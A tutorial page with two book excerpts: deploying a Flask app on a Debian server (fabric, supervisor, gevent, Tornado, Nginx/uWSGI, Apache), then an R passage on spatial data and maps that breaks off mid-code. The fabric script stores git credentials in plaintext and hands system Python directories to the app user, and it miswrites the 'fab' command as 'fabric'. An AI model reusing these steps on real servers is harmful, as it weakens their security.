How-To Tutorials

30 Sep 2015

16 min read

Deploying on your own server

30 Sep 2015

In this article by Jack Stouffer, the author of the book Mastering Flask, you will learn how to deploy and host your application on the different options available, and the advantages and disadvantages related to them. The most common way to deploy any web app is to run it on a server that you have control over. Control in this case means access to the terminal on the server with an administrator account. This type of deployment gives you the most amount of freedom out of the other choices as it allows you to install any program or tool you wish. This is in contrast to other hosting solutions where the web server and database are chosen for you. This type of deployment also happens to be the least expensive option. The downside to this freedom is that you take the responsibility of keeping the server up, backing up user data, keeping the software on the server up to date to avoid security issues, and so on. Entire books have been written on good server management, so if this is not a responsibility that you believe you or your company can handle, it would be best if you choose one of the other deployment options. This section will be based on a Debian Linux-based server, as Linux is far and away the most popular OS for running web servers, and Debian is the most popular Linux distro (a particular combination of software and the Linux kernel released as a package). Any OS with Bash and a program called SSH (which will be introduced in the next section) will work for this article, the only differences will be the command-line programs to install software on the server. (For more resources related to this topic, see here.) Each of these web servers will use a protocol named Web Server Gateway Interface (WSGI), which is a standard designed to allow Python web applications to easily communicate with web servers. We will never directly work with WSGI. However, most of the web server interfaces we will be using will have WSGI in their name, and it can be confusing if you don't know what the name is. Pushing code to your server with fabric To automate the process of setting up and pushing our application code to the server, we will use a Python tool called fabric. Fabric is a command-line program that reads and executes Python scripts on remote servers using a tool called SSH. SSH is a protocol that allows a user of one computer to remotely log in to another computer and execute commands on the command line, provided that the user has an account on the remote machine. To install fabric, we will use pip: $ pip install fabric Fabric commands are collections of command-line programs to be run on the remote machine's shell, in this case, Bash. We are going to make three different commands: one to run our unit tests, one to set up a brand new server to our specifications, and one to have the server update its copy of the application code with git. We will store these commands in a new file at the root of our project directory called fabfile.py. As it's the easiest to create, let's make the test command first: from fabric.api import local def test(): local('python -m unittest discover') To run this function from the command line, we can use fabric's command-line interface by passing the name of the command to run: $ fab test [localhost] local: python -m unittest discover ..... --------------------------------------------------------------------- Ran 5 tests in 6.028s OK Fabric has three main commands: local, run, and sudo. The local function, as seen in the preceding function, runs commands on the local computer. The run and sudo functions run commands on a remote machine, but sudo runs commands as an administrator. All of these functions notify fabric if the command ran successfully or not. If a command didn't run successfully, meaning that our tests failed in this case, any other commands in the function will not be run. This is useful for our commands because it allows us to force ourselves not to push any code to the server that does not pass our tests. Now we need to create the command to set up a new server from scratch. What this command will do is install the software our production environment needs as well as downloads the code from our centralized git repository. It will also create a new user that will act as the runner of the web server as well as the owner of the code repository. Do not run your webserver or have your code deployed by the root user. This opens your application to a whole host of security vulnerabilities. This command will differ based on your operating system, and we will be adding to this command in the rest of the article based on what server you choose: from fabric.api import env, local, run, sudo, cd env.hosts = ['deploy@[your IP]'] def upgrade_libs(): sudo("apt-get update") sudo("apt-get upgrade") def setup(): test() upgrade_libs() # necessary to install many Python libraries sudo("apt-get install -y build-essential") sudo("apt-get install -y git") sudo("apt-get install -y python") sudo("apt-get install -y python-pip") # necessary to install many Python libraries sudo("apt-get install -y python-all-dev") run("useradd -d /home/deploy/ deploy") run("gpasswd -a deploy sudo") # allows Python packages to be installed by the deploy user sudo("chown -R deploy /usr/local/") sudo("chown -R deploy /usr/lib/python2.7/") run("git config --global credential.helper store") with cd("/home/deploy/"): run("git clone [your repo URL]") with cd('/home/deploy/webapp'): run("pip install -r requirements.txt") run("python manage.py createdb") There are two new fabric features in this script. One is the env.hosts assignment, which tells fabric the user and IP address of the machine it should be logging in to. Second, there is the cd function used in conjunction with the with keyword, which executes any functions in the context of that directory instead of the home directory of the deploy user. The line that modifies the git configuration is there to tell git to remember your repository's username and password, so you do not have to enter it every time you wish to push code to the server. Also, before the server is set up, we make sure to update the server's software to keep the server up to date. Finally, we have the function to push our new code to the server. In time, this command will also restart the web server and reload any configuration files that come from our code. But this depends on the server you choose, so this is filled out in the subsequent sections: def deploy(): test() upgrade_libs() with cd('/home/deploy/webapp'): run("git pull") run("pip install -r requirements.txt") So, if we were to begin working on a new server, all we would need to do to set it up is to run the following commands: $ fabric setup $ fabric deploy Running your web server with supervisor Now that we have automated our updating process, we need some program on the server to make sure that our web server, and database if you aren't using SQLite, is running. To do this, we will use a simple program called supervisor. All that supervisor does is automatically run command-line programs in background processes and allows you to see the status of running programs. Supervisor also monitors all of the processes its running, and if the process dies, it tries to restart it. To install supervisor, we need to add it to the setup command in our fabfile.py: def setup(): … sudo("apt-get install -y supervisor") To tell supervisor what to do, we need to create a configuration file and then copy it to the /etc/supervisor/conf.d/ directory of our server during the deploy fabric command. Supervisor will load all of the files in this directory when it starts and attempt to run them. In a new file in the root of our project directory named supervisor.conf, add the following: [program:webapp] command= directory=/home/deploy/webapp user=deploy [program:rabbitmq] command=rabbitmq-server user=deploy [program:celery] command=celery worker -A celery_runner directory=/home/deploy/webapp user=deploy This is the bare minimum configuration needed to get a web server up and running. But, supervisor has a lot more configuration options. To view all of the customizations, go to the supervisor documentation at http://supervisord.org/. This configuration tells supervisor to run a command in the context of /home/deploy/webapp under the deploy user. The right hand of the command value is empty because it depends on what server you are running and will be filled in for each section. Now we need to add a sudo call in the deploy command to copy this configuration file to the /etc/supervisor/conf.d/ directory: def deploy(): … with cd('/home/deploy/webapp'): … sudo("cp supervisord.conf /etc/supervisor/conf.d/webapp.conf") sudo('service supervisor restart') A lot of projects just create the files on the server and forget about them, but having the configuration file stored in our git repository and copied on every deployment gives several advantages. First, this means that it easy to revert changes if something goes wrong using git. Second, it means that we don't have to log in to our server in order to make changes to the files. Don't use the Flask development server in production. Not only it fails to handle concurrent connections, but it also allows arbitrary Python code to be run on your server. Gevent The simplest option to get a web server up and running is to use a Python library called gevent to host your application. Gevent is a Python library that adds an alternative way of doing concurrent programming outside of the Python threading library called coroutines. Gevent has an interface for running WSGI applications that is both simple and has good performance. A simple gevent server can easily handle hundreds of concurrent users, which is more in number than 99 percent of websites on the Internet will ever have. The downside to this option is that its simplicity means a lack of configuration options. There is no way, for example, to add rate limiting to the server or to add HTTPS traffic. This deployment option is purely for sites that you don't expect to receive a huge amount of traffic. Remember YAGNI (short for You Aren't Gonna Need It); only upgrade to a different web server if you really need to. Coroutines are a bit outside of the scope of this book, so a good explanation can be found at https://en.wikipedia.org/wiki/Coroutine. To install gevent, we will use pip: $ pip install gevent In a new file in the root of the project directory named gserver.py, add the following: from gevent.wsgi import WSGIServer from webapp import create_app app = create_app('webapp.config.ProdConfig') server = WSGIServer(('', 80), app) server.serve_forever() To run the server with supervisor, just change the command value to the following: [program:webapp] command=python gserver.py directory=/home/deploy/webapp user=deploy Now when you deploy, gevent will be automatically installed for you by running your requirements.txt on every deployment, that is, if you are properly pip freeze–ing after every new dependency is added. Tornado Tornado is another very simple way to deploy WSGI apps purely with Python. Tornado is a web server that is designed to handle thousands of simultaneous connections. If your application needs real-time data, Tornado also supports websockets for continuous, long-lived connections to the server. Do not use Tornado in production on a Windows server. The Windows version of Tornado is not only much slower, but it is considered beta quality software. To use Tornado with our application, we will use Tornado's WSGIContainer in order to wrap the application object to make it Tornado compatible. Then, Tornado will start to listen on port 80 for requests until the process is terminated. In a new file named tserver.py, add the following: from tornado.wsgi import WSGIContainer from tornado.httpserver import HTTPServer from tornado.ioloop import IOLoop from webapp import create_app app = WSGIContainer(create_app("webapp.config.ProdConfig")) http_server = HTTPServer(app) http_server.listen(80) IOLoop.instance().start() To run the Tornado with supervisor, just change the command value to the following: [program:webapp] command=python tserver.py directory=/home/deploy/webapp user=deploy Nginx and uWSGI If you need more performance or customization, the most popular way to deploy a Python web application is to use the web server Nginx as a frontend for the WSGI server uWSGI by using a reverse proxy. A reverse proxy is a program in networks that retrieves contents for a client from a server as if they returned from the proxy itself as shown in the following figure: Nginx and uWSGI are used in this way because we get the power of the Nginx frontend while having the customization of uWSGI. Nginx is a very powerful web server that became popular by providing the best combination of speed and customization. Nginx is consistently faster than other web severs, such as Apache httpd, and has native support for WSGI applications. The way it achieves this speed is several good architecture decisions as well as the decision early on that they were not going to try to cover a large amount of use cases like Apache does. Having a smaller feature set makes it much easier to maintain and optimize the code. From a programmer's perspective, it is also much easier to configure Nginx, as there is no giant default configuration file (httpd.conf) that needs to be overridden with .htaccess files in each of your project directories. One downside is that Nginx has a much smaller community than Apache, so if you have an obscure problem, you are less likely to be able to find answers online. Also, it's possible that a feature that most programmers are used to in Apache isn't supported in Nginx. uWSGI is a web server that supports several different types of server interfaces, including WSGI. uWSGI handles severing the application content as well as things such as load balancing traffic across several different processes and threads. To install uWSGI, we will use pip in the following way: $ pip install uwsgi In order to run our application, uWSGI needs a file with an accessible WSGI application. In a new file named wsgi.py in the top level of the project directory, add the following: from webapp import create_app app = create_app("webapp.config.ProdConfig") To test uWSGI, we can run it from the command line with the following: $ uwsgi --socket 127.0.0.1:8080 --wsgi-file wsgi.py --callable app --processes 4 --threads 2 If you are running this on your server, you should be able to access port 8080 and see your app (if you don't have a firewall that is). What this command does is load the app object from the wsgi.py file and makes it accessible from localhost on port 8080. It also spawns four different processes with two threads each, which are automatically load balanced by a master process. This amount of processes is the overkill for the vast, vast majority of websites. To start off, use a single process with two threads and scale up from there. Instead of adding all of the configuration options on the command line, we can create a text file to hold our configuration, which brings the same benefits for configuration that were listed in the section on supervisor. In a new file in the root of the project directory named uwsgi.ini, add the following: [uwsgi] socket = 127.0.0.1:8080 wsgi-file = wsgi.py callable = app processes = 4 threads = 2 uWSGI supports hundreds of configuration options as well as several official and unofficial plugins. To leverage the full power of uWSGI, you can explore the documentation at http://uwsgi-docs.readthedocs.org/. Let's run the server now from supervisor: [program:webapp] command=uwsgi uwsgi.ini directory=/home/deploy/webapp user=deploy We also need to install Nginx during the setup function: def setup(): … sudo("apt-get install -y nginx") Because we are installing Nginx from the OS's package manager, the OS will handle running Nginx for us. At the time of writing, the Nginx version in the official Debian package manager is several years old. To install the most recent version, follow the instructions here: http://wiki.nginx.org/Install. Next, we need to create an Nginx configuration file and then copy it to the /etc/nginx/sites-available/ directory when we push the code. In a new file in the root of the project directory named nginx.conf, add the following server { listen 80; server_name your_domain_name; location / { include uwsgi_params; uwsgi_pass 127.0.0.1:8080; } location /static { alias /home/deploy/webapp/webapp/static; } } What this configuration file does is tell Nginx to listen for incoming requests on port 80 and forward all requests to the WSGI application that is listening on port 8080. Also, it makes an exception for any requests for static files and instead sends those requests directly to the file system. Bypassing uWSGI for static files gives a great performance boost, as Nginx is really good at serving static files quickly. Finally, in the fabfile.py file: def deploy(): … with cd('/home/deploy/webapp'): … sudo("cp nginx.conf " "/etc/nginx/sites-available/[your_domain]") sudo("ln -sf /etc/nginx/sites-available/your_domain " "/etc/nginx/sites-enabled/[your_domain]") sudo("service nginx restart") Apache and uWSGI Using Apache httpd with uWSGI has mostly the same setup. First off, we need an apache configuration file in a new file in the root of our project directory named apache.conf: <VirtualHost *:80> <Location /> ProxyPass / uwsgi://127.0.0.1:8080/ </Location> </VirtualHost> This file just tells Apache to pass all requests on port 80 to the uWSGI web server listening on port 8080. But, this functionality requires an extra Apache plugin from uWSGI called mod proxy uWSGI. We can install this as well as Apache in the set command: def setup(): … sudo("apt-get install -y apache2") sudo("apt-get install -y libapache2-mod-proxy-uwsgi") Finally, in the deploy command, we need to copy our Apache configuration file into Apache's configuration directory. def deploy(): … with cd('/home/deploy/webapp'): … sudo("cp apache.conf " "/etc/apache2/sites-available/[your_domain]") sudo("ln -sf /etc/apache2/sites-available/[your_domain] " "/etc/apache2/sites-enabled/[your_domain]") sudo("service apache2 restart") Summary In this article you learnt that there are many different options to hosting your application, each having their own pros and cons. Deciding on one depends on the amount of time and money you are willing to spend as well as the total number of users you expect. Resources for Article: Further resources on this subject: Handling sessions and users[article] Snap – The Code Snippet Sharing Application[article] Man, Do I Like Templates! [article] from fabric.api import local def test(): local('python -m unittest discover')

0
0
9985

How-To Tutorials

Packt

29 Sep 2015

25 min read

Data Around Us

Packt

29 Sep 2015

25 min read

In this article by Gergely Daróczi, author of the book Mastering Data Analysis with R we will discuss Spatial data, also known as geospatial data, which identifies geographic locations, such as natural or constructed features around us. Although all observations have some spatial content, such as the location of the observation, but this is out of most data analysis tools' range due to the complex nature of spatial information; alternatively, the spatiality might not be that interesting (at first sight) in the given research topic. On the other hand, analyzing spatial data can reveal some very important underlying structures of the data, and it is well worth spending time visualizing the differences and similarities between close or far data points. In this article, we are going to help with this and will use a variety of R packages to: Retrieve geospatial information from the Internet Visualize points and polygons on a map (For more resources related to this topic, see here.) Geocoding We will use the hflights dataset to demonstrate how one can deal with data bearing spatial information. To this end, let's aggregate our dataset but instead of generating daily data let's view the aggregated characteristics of the airports. For the sake of performance, we will use the data.table package: > library(hflights) > library(data.table) > dt <- data.table(hflights)[, list( + N = .N, + Cancelled = sum(Cancelled), + Distance = Distance[1], + TimeVar = sd(ActualElapsedTime, na.rm = TRUE), + ArrDelay = mean(ArrDelay, na.rm = TRUE)) , by = Dest] So we have loaded and then immediately transformed the hlfights dataset to a data.table object. At the same time, we aggregated by the destination of the flights to compute: The number of rows The number of cancelled flights The distance The standard deviation of the elapsed time of the flights The arithmetic mean of the delays The resulting R object looks like this: > str(dt) Classes 'data.table' and 'data.frame': 116 obs. of 6 variables: $ Dest : chr "DFW" "MIA" "SEA" "JFK" ... $ N : int 6653 2463 2615 695 402 6823 4893 5022 6064 ... $ Cancelled: int 153 24 4 18 1 40 40 27 33 28 ... $ Distance : int 224 964 1874 1428 3904 305 191 140 1379 862 ... $ TimeVar : num 10 12.4 16.5 19.2 15.3 ... $ ArrDelay : num 5.961 0.649 9.652 9.859 10.927 ... - attr(*, ".internal.selfref")=<externalptr> So we have 116 observations all around the world and five variables describing those. Although this seems to be a spatial dataset, we have no geospatial identifiers that a computer can understand per se, so let's fetch the geocodes of these airports from the Google Maps API via the ggmap package. First, let's see how it works when we are looking for the geo-coordinates of Houston: > library(ggmap) > (h <- geocode('Houston, TX')) Information from URL : http://maps.googleapis.com/maps/api/geocode/json?address=Houston,+TX&sensor=false lon lat 1 -95.3698 29.76043 So the geocode function can return the matched latitude and longitude of the string we sent to Google. Now let's do the very same thing for all flight destinations: > dt[, c('lon', 'lat') := geocode(Dest)] Well, this took some time as we had to make 116 separate queries to the Google Maps API. Please note that Google limits you to 2,500 queries a day without authentication, so do not run this on a large dataset. There is a helper function in the package, called geocodeQueryCheck, which can be used to check the remaining number of free queries for the day. Some of the methods and functions we plan to use in some later sections of this article do not support data.table, so let's fall back to the traditional data.frame format and also print the structure of the current object: > str(setDF(dt)) 'data.frame': 116 obs. of 8 variables: $ Dest : chr "DFW" "MIA" "SEA" "JFK" ... $ N : int 6653 2463 2615 695 402 6823 4893 5022 6064 ... $ Cancelled: int 153 24 4 18 1 40 40 27 33 28 ... $ Distance : int 224 964 1874 1428 3904 305 191 140 1379 862 ... $ TimeVar : num 10 12.4 16.5 19.2 15.3 ... $ ArrDelay : num 5.961 0.649 9.652 9.859 10.927 ... $ lon : num -97 136.5 -122.3 -73.8 -157.9 ... $ lat : num 32.9 34.7 47.5 40.6 21.3 ... This was pretty quick and easy, wasn't it? Now that we have the longitude and latitude values of all the airports, we can try to show these points on a map. Visualizing point data in space For the first time, let's keep it simple and load some package-bundled polygons as the base map. To this end, we will use the maps package. After loading it, we use the map function to render the polygons of the United States of America, add a title, and then some points for the airports and also for Houston with a slightly modified symbol: > library(maps) > map('state') > title('Flight destinations from Houston,TX') > points(h$lon, h$lat, col = 'blue', pch = 13) > points(dt$lon, dt$lat, col = 'red', pch = 19) And showing the airport names on the plot is pretty easy as well: we can use the well-known functions from the base graphics package. Let's pass the three character names as labels to the text function with a slightly increased y value to shift the preceding text the previously rendered data points: > text(dt$lon, dt$lat + 1, labels = dt$Dest, cex = 0.7) Now we can also specify the color of the points to be rendered. This feature can be used to plot our first meaningful map to highlight the number of flights in 2011 to different parts of the USA: > map('state') > title('Frequent flight destinations from Houston,TX') > points(h$lon, h$lat, col = 'blue', pch = 13) > points(dt$lon, dt$lat, pch = 19, + col = rgb(1, 0, 0, dt$N / max(dt$N))) > legend('bottomright', legend = round(quantile(dt$N)), pch = 19, + col = rgb(1, 0, 0, quantile(dt$N) / max(dt$N)), box.col = NA) So the intensity of red shows the number of flights to the given points (airports); the values range from 1 to almost 10,000. Probably it would be more meaningful to compute these values on a state level, as there are many airports, very close to each other, that might be better aggregated at a higher administrative area level. To this end, we load the polygon of the states, match the points of interest (airports) with the overlaying polygons (states), and render the polygons as a thematic map instead of points, like we did on the previous pages. Finding polygon overlays of point data We already have all the data we need to identify the parent state of each airport. The dt dataset includes the geo-coordinates of the locations, and we managed to render the states as polygons with the map function. Actually, this latter function can return the underlying dataset without rendering a plot: > str(map_data <- map('state', plot = FALSE, fill = TRUE)) List of 4 $ x : num [1:15599] -87.5 -87.5 -87.5 -87.5 -87.6 ... $ y : num [1:15599] 30.4 30.4 30.4 30.3 30.3 ... $ range: num [1:4] -124.7 -67 25.1 49.4 $ names: chr [1:63] "alabama" "arizona" "arkansas" "california" ... - attr(*, "class")= chr "map" So we have around 16,000 points describing the boundaries of the US states, but this map data is more detailed than we actually need (see for example the name of the polygons starting with Washington): > grep('^washington', map_data$names, value = TRUE) [1] "washington:san juan island" "washington:lopez island" [3] "washington:orcas island" "washington:whidbey island" [5] "washington:main" In short, the non-connecting parts of a state are defined as separate polygons. To this end, let's save a list of the state names without the string after the colon: > states <- sapply(strsplit(map_data$names, ':'), '[[', 1) We will use this list as the basis of aggregation from now on. Let's transform this map dataset into another class of object, so that we can use the powerful features of the sp package. We will use the maptools package to do this transformation: > library(maptools) > us <- map2SpatialPolygons(map_data, IDs = states, + proj4string = CRS("+proj=longlat +datum=WGS84")) An alternative way of getting the state polygons might be to directly load those instead of transforming from other data formats as described earlier. To this end, you may find the raster package especially useful to download free map shapefiles from gadm.org via the getData function. Although these maps are way too detailed for such a simple task, you can always simplify those—for example, with the gSimplify function of the rgeos package. So we have just created an object called us, which includes the polygons of map_data for each state with the given projection. This object can be shown on a map just like we did previously, although you should use the general plot method instead of the map function: > plot(us) Besides this, however, the sp package supports so many powerful features! For example, it's very easy to identify the overlay polygons of the provided points via the over function. As this function name conflicts with the one found in the grDevices package, it's better to refer to the function along with the namespace using a double colon: > library(sp) > dtp <- SpatialPointsDataFrame(dt[, c('lon', 'lat')], dt, + proj4string = CRS("+proj=longlat +datum=WGS84")) > str(sp::over(us, dtp)) 'data.frame': 49 obs. of 8 variables: $ Dest : chr "BHM" "PHX" "XNA" "LAX" ... $ N : int 2736 5096 1172 6064 164 NA NA 2699 3085 7886 ... $ Cancelled: int 39 29 34 33 1 NA NA 35 11 141 ... $ Distance : int 562 1009 438 1379 926 NA NA 1208 787 689 ... $ TimeVar : num 10.1 13.61 9.47 15.16 13.82 ... $ ArrDelay : num 8.696 2.166 6.896 8.321 -0.451 ... $ lon : num -86.8 -112.1 -94.3 -118.4 -107.9 ... $ lat : num 33.6 33.4 36.3 33.9 38.5 ... What happened here? First, we passed the coordinates and the whole dataset to the SpatialPointsDataFrame function, which stored our data as spatial points with the given longitude and latitude values. Next we called the over function to left-join the values of dtp to the US states. An alternative way of identifying the state of a given airport is to ask for more detailed information from the Google Maps API. By changing the default output argument of the geocode function, we can get all address components for the matched spatial object, which of course includes the state as well. Look for example at the following code snippet: geocode('LAX','all')$results[[1]]$address_components Based on this, you might want to get a similar output for all airports and filter the list for the short name of the state. The rlist package would be extremely useful in this task, as it offers some very convenient ways of manipulating lists in R. The only problem here is that we matched only one airport to the states, which is definitely not okay. See for example the fourth column in the earlier output: it shows LAX as the matched airport for California (returned by states[4]), although there are many others there as well. To overcome this issue, we can do at least two things. First, we can use the returnList argument of the over function to return all matched rows of dtp, and we will then post-process that data: > str(sapply(sp::over(us, dtp, returnList = TRUE), + function(x) sum(x$Cancelled))) Named int [1:49] 51 44 34 97 23 0 0 35 66 149 ... - attr(*, "names")= chr [1:49] "alabama" "arizona" "arkansas" ... So we created and called an anonymous function that will sum up the Cancelled values of the data.frame in each element of the list returned by over. Another, probably cleaner, approach is to redefine dtp to only include the related values and pass a function to over to do the summary: > dtp <- SpatialPointsDataFrame(dt[, c('lon', 'lat')], + dt[, 'Cancelled', drop = FALSE], + proj4string = CRS("+proj=longlat +datum=WGS84")) > str(cancels <- sp::over(us, dtp, fn = sum)) 'data.frame': 49 obs. of 1 variable: $ Cancelled: int 51 44 34 97 23 NA NA 35 66 149 ... Either way, we have a vector to merge back to the US state names: > val <- cancels$Cancelled[match(states, row.names(cancels))] And to update all missing values to zero (as the number of cancelled flights in a state without any airport is not missing data, but exactly zero for sure): > val[is.na(val)] <- 0 Plotting thematic maps Now we have everything to create our first thematic map. Let's pass the val vector to the previously used map function (or plot it using the us object), specify a plot title, add a blue point for Houston, and then create a legend, which shows the quantiles of the overall number of cancelled flights as a reference: > map("state", col = rgb(1, 0, 0, sqrt(val/max(val))), fill = TRUE) > title('Number of cancelled flights from Houston to US states') > points(h$lon, h$lat, col = 'blue', pch = 13) > legend('bottomright', legend = round(quantile(val)), + fill = rgb(1, 0, 0, sqrt(quantile(val)/max(val))), box.col = NA) Please note that, instead of a linear scale, we decided to compute the square root of the relative values to define the intensity of the fill color, so that we can visually highlight the differences between the states. This was necessary as most flight cancellations happened in Texas (748), and there were no more than 150 cancelled flights in any other state (with the average being around 45). You can also easily load ESRI shape files or other geospatial vector data formats into R as points or polygons with a bunch of packages already discussed and a few others as well, such as the maptools, rgdal, dismo, raster, or shapefile packages. Another, probably easier, way to generate country-level thematic maps, especially choropleth maps, is to load the rworldmap package made by Andy South, and rely on the convenient mapCountryData function. Rendering polygons around points Besides thematic maps, another really useful way of presenting spatial data is to draw artificial polygons around the data points based on the data values. This is especially useful if there is no available polygon shape file to be used to generate a thematic map. A level plot, contour plot, or isopleths, might be an already familiar design from tourist maps, where the altitude of the mountains is represented by a line drawn around the center of the hill at the very same levels. This is a very smart approach having maps present the height of hills—projecting this third dimension onto a 2-dimensional image. Now let's try to replicate this design by considering our data points as mountains on the otherwise flat map. We already know the heights and exact geo-coordinates of the geometric centers of these hills (airports); the only challenge here is to draw the actual shape of these objects. In other words: Are these mountains connected? How steep are the hillsides? Should we consider any underlying spatial effects in the data? In other words, can we actually render these as mountains with a 3D shape instead of plotting independent points in space? If the answer for the last question is positive, then we can start trying to answer the other questions by fine-tuning the plot parameters. For now, let's simply suppose that there is a spatial effect in the underlying data, and it makes sense to visualize the data in such a way. Later, we will have the chance to disprove or support this statement either by analyzing the generated plots, or by building some geo-spatial models—some of these will be discussed later, in the Spatial Statistics section. Contour lines First, let's expand our data points into a matrix with the fields package. The size of the resulting R object is defined arbitrarily but, for the given number of rows and columns, which should be a lot higher to generate higher resolution images, 256 is a good start: > library(fields) > out <- as.image(dt$ArrDelay, x = dt[, c('lon', 'lat')], + nrow = 256, ncol = 256) The as.image function generates a special R object, which in short includes a 3‑dimensional matrix-like data structure, where the x and y axes represent the longitude and latitude ranges of the original data respectively. To simplify this even more, we have a matrix with 256 rows and 256 columns, where each of those represents a discrete value evenly distributed between the lowest and highest values of the latitude and longitude. And on the z axis, we have the ArrDelay values—which are in most cases of course missing: > table(is.na(out$z)) FALSE TRUE 112 65424 What does this matrix look like? It's better to see what we have at the moment: > image(out) Well, this does not seem to be useful at all. What is shown there? We rendered the x and y dimensions of the matrix with z colors here, and most tiles of this map are empty due to the high amount of missing values in z. Also, it's pretty straightforward now that the dataset included many airports outside the USA as well. How does it look if we focus only on the USA? > image(out, xlim = base::range(map_data$x, na.rm = TRUE), + ylim = base::range(map_data$y, na.rm = TRUE)) An alternative and more elegant approach to rendering only the US part of the matrix would be to drop the non-US airports from the database before actually creating the out R object. Although we will continue with this example for didactic purposes, with real data make sure you concentrate on the target subset of your data instead of trying to smooth and model unrelated data points as well. A lot better! So we have our data points as a tile, now let's try to identify the slope of these mountain peaks, to be able to render them on a future map. This can be done by smoothing the matrix: > look <- image.smooth(out, theta = .5) > table(is.na(look$z)) FALSE TRUE 14470 51066 As can be seen in the preceding table, this algorithm successfully eliminated many missing values from the matrix. The image.smooth function basically reused our initial data point values in the neighboring tiles, and computed some kind of average for the conflicting overrides. This smoothing algorithm results in the following arbitrary map, which does not respect any political or geographical boundaries: > image(look) It would be really nice to plot these artificial polygons along with the administrative boundaries, so let's clear out all cells that do not belong to the territory of the USA. We will use the point.in.polygon function from the sp package to do so: > usa_data <- map('usa', plot = FALSE, region = 'main') > p <- expand.grid(look$x, look$y) > library(sp) > n <- which(point.in.polygon(p$Var1, p$Var2, + usa_data$x, usa_data$y) == 0) > look$z[n] <- NA In a nutshell, we have loaded the main polygon of the USA without any sub-administrative areas, and verified our cells in the look object, if those are overlapping the polygon. Then we simply reset the value of the cell, if not. The next step is to render the boundaries of the USA, plot our smoothed contour plot, then add some eye-candy in the means of the US states and, the main point of interest, the airport: > map("usa") > image(look, add = TRUE) > map("state", lwd = 3, add = TRUE) > title('Arrival delays of flights from Houston') > points(dt$lon, dt$lat, pch = 19, cex = .5) > points(h$lon, h$lat, pch = 13) Now this is pretty neat, isn't it? Voronoi diagrams An alternative way of visualizing point data with polygons is to generate Voronoi cells between them. In short, the Voronoi map partitions the space into regions around the data points by aligning all parts of the map to one of the regions to minimize the distance from the central data points. This is extremely easy to interpret, and also to implement in R. The deldir package provides a function with the very same name for Delaunay triangulation: > library(deldir) > map("usa") > plot(deldir(dt$lon, dt$lat), wlines = "tess", lwd = 2, + pch = 19, col = c('red', 'darkgray'), add = TRUE) Here, we represented the airports with red dots, as we did before, but also added the Dirichlet tessellation (Voronoi cells) rendered as dark-gray dashed lines. For more options on how to fine-tune the results, see the plot.deldir method. In the next section, let's see how to improve this plot by adding a more detailed background map to it. Satellite maps There are many R packages on CRAN that can fetch data from Google Maps, Stamen, Bing, or OpenStreetMap—even some of the packages we previously used in this article, like the ggmap package, can do this. Similarly, the dismo package also comes with both geo-coding and Google Maps API integration capabilities, and there are some other packages focused on that latter, such as the RgoogleMaps package. Now we will use the OpenStreetMap package, mainly because it supports not only the awesome OpenStreetMap database back-end, but also a bunch of other formats as well. For example, we can render really nice terrain maps via Stamen: > library(OpenStreetMap) > map <- openmap(c(max(map_data$y, na.rm = TRUE), + min(map_data$x, na.rm = TRUE)), + c(min(map_data$y, na.rm = TRUE), + max(map_data$x, na.rm = TRUE)), + type = 'stamen-terrain') So we defined the left upper and right lower corners of the map we need, and also specified the map style to be a satellite map. As the data by default arrives from the remote servers with the Mercator projections, we first have to transform that to WGS84 (we used this previously), so that we can render the points and polygons on the top of the fetched map: > map <- openproj(map, + projection = '+proj=longlat +ellps=WGS84 +datum=WGS84 +no_defs') And Showtime at last: > plot(map) > plot(deldir(dt$lon, dt$lat), wlines = "tess", lwd = 2, + col = c('red', 'black'), pch = 19, cex = 0.5, add = TRUE) This seems to be a lot better compared to the outline map we created previously. Now you can try some other map styles as well, such as mapquest-aerial, or some of the really nice-looking cloudMade designs. Interactive maps Besides being able to use Web-services to download map tiles for the background of the maps created in R, we can also rely on some of those to generate truly interactive maps. One of the best known related services is the Google Visualization API, which provides a platform for hosting visualizations made by the community; you can also use it to share maps you've created with others. Querying Google Maps In R, you can access this API via the googleVis package written and maintained by Markus Gesmann and Diego de Castillo. Most functions of the package generate HTML and JavaScript code that we can directly view in a Web browser as an SVG object with the base plot function; alternatively, we can integrate them in a Web page, for example via the IFRAME HTML tag. The gvisIntensityMap function takes a data.frame with country ISO or USA state codes and the actual data to create a simple intensity map. We will use the cancels dataset we created in the Finding Polygon Overlays of Point Data section but, before that, we have to do some data transformations. Let's add the state name as a new column to the data.frame, and replace the missing values with zero: > cancels$state <- rownames(cancels) > cancels$Cancelled[is.na(cancels$Cancelled)] <- 0 Now it's time to load the package and pass the data along with a few extra parameters, signifying that we want to generate a state-level US map: > library(googleVis) > plot(gvisGeoChart(cancels, 'state', 'Cancelled', + options = list( + region = 'US', + displayMode = 'regions', + resolution = 'provinces'))) The package also offers opportunities to query the Google Map API via the gvisMap function. We will use this feature to render the airports from the dt dataset as points on a Google Map with an auto-generated tooltip of the variables. But first, as usual, we have to do some data transformations again. The location argument of the gvisMap function takes the latitude and longitude values separated by a colon: > dt$LatLong <- paste(dt$lat, dt$lon, sep = ':') We also have to generate the tooltips as a new variable, which can be done easily with an apply call. We will concatenate the variable names and actual values separated by a HTML line break: > dt$tip <- apply(dt, 1, function(x) + paste(names(dt), x, collapse = '<br/ >')) And now we just pass these arguments to the function for an instant interactive map: > plot(gvisMap(dt, 'LatLong', tipvar = 'tip')) Another nifty feature of the googleVis package is that you can easily merge the different visualizations into one by using the gvisMerge function. The use of this function is quite simple: specify any two gvis objects you want to merge, and also whether they are to be placed horizontally or vertically. JavaScript mapping libraries The great success of the trending JavaScript data visualization libraries is only partly due to their great design. I suspect other factors also contribute to the general spread of such tools: it's very easy to create and deploy full-blown data models, especially since the release and on-going development of Mike Bostock's D3.js. Although there are also many really useful and smart R packages to interact directly with D3 and topojson (see for example my R user activity compilation at http://bit.ly/countRies). Now we will only focus on how to use Leaflet— probably the most used JavaScript library for interactive maps. What I truly love in R is that there are many packages wrapping other tools, so that R users can rely on only one programming language, and we can easily use C++ programs and Hadoop MapReduce jobs or build JavaScript-powered dashboards without actually knowing anything about the underlying technology. This is especially true when it comes to Leaflet! There are at least two very nice packages that can generate a Leaflet plot from the R console, without a single line of JavaScript. The Leaflet reference class of the rCharts package was developed by Ramnath Vaidyanathan, and includes some methods to create a new object, set the viewport and zoom level, add some points or polygons to the map, and then render or print the generated HTML and JavaScript code to the console or to a file. Unfortunately, this package is not on CRAN yet, so you have to install it from GitHub: > devtools::install_github('ramnathv/rCharts') As a quick example, let's generate a Leaflet map of the airports with some tooltips, like we did with the Google Maps API in the previous section. As the setView method expects numeric geo-coordinates as the center of the map, we will use Kansas City's airport as a reference: > library(rCharts) > map <- Leaflet$new() > 